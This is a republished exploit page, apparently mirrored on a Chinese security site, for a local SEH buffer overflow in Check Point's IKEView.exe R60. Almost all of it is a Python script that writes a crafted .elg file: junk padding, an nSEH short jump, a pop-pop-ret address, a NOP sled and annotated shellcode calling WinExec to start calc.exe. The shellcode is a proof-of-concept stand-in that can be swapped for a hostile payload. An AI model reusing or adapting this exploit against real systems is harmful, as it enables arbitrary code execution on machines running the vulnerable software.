|
IKEView.exe R60 - .elg Local SEH Exploit
|
|
来源:cor3sm4sh3r[at]gmail.com 作者:cor3sm4sh3r 发布时间:2015-09-18
|
|
# Exploit Title: IKEView.exe R60 localSEH Exploit
# Date: 17/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450
# Category: Local
#[+] Gr337z: hyp3rlinx for finding the bug
#[+] Source:
#http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
# exploit as been tested on win XP professional sp2
#Vendor:
#================================
#www.checkpoint.com
#http://pingtool.org/downloads/IKEView.exe
#!/usr/bin/env python
file="IKEView.elg"
x=open(file,"w")
nseh = "\x90\x90\xeb\x32" #short jump
seh = "\xc0\x28\x40\x00" #pop pop ret
nopsled = "\x90"*50
#badchars += "\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buf = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
buf += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
buf += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
buf += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
buf += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
buf += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
buf += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
buf += "\xFF\xD3" #=> CALL EBX
buf += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX
buf += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
buf += "\xFF\xD3" #=> CALL EBX
junk = "A"*(4424)
payload = junk + nseh + seh + nopsled + buf
x.write(payload)
x.close()
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
